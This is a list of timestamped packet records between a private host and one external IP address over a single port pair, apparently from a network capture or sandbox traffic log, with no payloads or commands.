Sep 15, 2024 15:02:28.277657032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277690887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277699947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.277709007 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277728081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277759075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.278779030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278798103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278815031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278846979 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.278870106 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.278934002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278951883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278969049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278985977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.278989077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.279068947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.287084103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287168026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287182093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287233114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287240982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.287250042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287283897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287293911 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.287302017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287319899 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.287321091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.287354946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.315851927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315874100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315879107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315958977 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.315973997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315980911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315987110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.315993071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316025972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316035986 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316041946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316054106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316062927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316068888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316085100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316085100 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316092014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316109896 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316127062 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316139936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316536903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316543102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316555023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316591978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316651106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316658020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316669941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316675901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.316698074 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.316720963 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.322993994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.322999954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323019981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323062897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.323102951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323117018 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323124886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323132038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323148966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.323174000 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.324629068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324636936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324651957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324702978 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.324774027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324779987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324791908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324796915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.324824095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.324848890 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.341228962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341248035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341283083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341315985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.341326952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341345072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341377020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341394901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.341397047 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.341437101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.342448950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342468023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342502117 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342521906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.342550993 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.342622042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342638969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342679024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342689037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.342700005 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.342736006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.347907066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.347982883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.347996950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348033905 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.348036051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348073959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348088026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.348093033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348109961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348128080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.348134995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.348170996 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351241112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351255894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351309061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351315022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351322889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351342916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351358891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351361990 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351376057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351397991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351414919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351694107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351735115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351751089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351756096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351787090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.351917982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351932049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.351969957 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352003098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352045059 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352049112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352251053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352267981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352303028 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352307081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352324963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352341890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352360964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352374077 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352406025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352459908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352478027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352494955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.352515936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.352530003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.358865976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358887911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358942032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358952999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.358961105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358978987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358994961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.358998060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.359013081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.359036922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.366549015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366575956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366609097 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.366617918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366661072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366678953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366678953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.366698027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366713047 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.366714001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366733074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.366764069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.368520975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368550062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368570089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368587017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368597984 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.368624926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368638992 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.368643045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368665934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.368678093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.368716002 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.369337082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369381905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369415998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369440079 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.369682074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369705915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369720936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369740963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.369754076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.369785070 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.377799034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377856016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377897024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.377897024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377917051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377949953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377974987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377990961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.377996922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.378010035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.378010988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.378025055 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.378036976 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.378070116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.411701918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411737919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411753893 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411767006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411773920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411781073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411787033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411794901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411854029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411859989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411861897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.411875963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411884069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411899090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411905050 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.411911964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.411922932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.411947966 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.411947966 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.412398100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412498951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412503958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412527084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412549973 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.412580967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.412664890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412672043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412684917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412692070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412698984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.412713051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.412738085 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.427791119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427812099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427818060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427879095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.427922964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.427959919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427967072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427980900 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.427988052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428018093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.428047895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.428163052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428169966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428181887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428219080 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.428252935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428260088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428273916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428280115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.428309917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.428334951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.438852072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.438869953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.438904047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.438920975 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.438961029 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.438978910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.438981056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439013958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439019918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439038992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439055920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439089060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439101934 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439107895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439125061 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439126015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439143896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439160109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439165115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439177036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439212084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439232111 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439241886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439249992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439263105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439268112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439285994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439301968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439302921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439321995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.439341068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.439367056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442076921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442095041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442128897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442146063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442209005 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442225933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442244053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442257881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442277908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442290068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442735910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442775011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442789078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442795038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442811966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442831039 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442847013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442857981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442866087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442868948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442915916 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.442935944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442951918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442971945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442992926 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.442997932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.443048954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.443049908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.443087101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.443105936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.443150043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.449521065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449538946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449594021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.449596882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.449610949 CEST	3736	49701	194.113.106.180	192.168.2.10
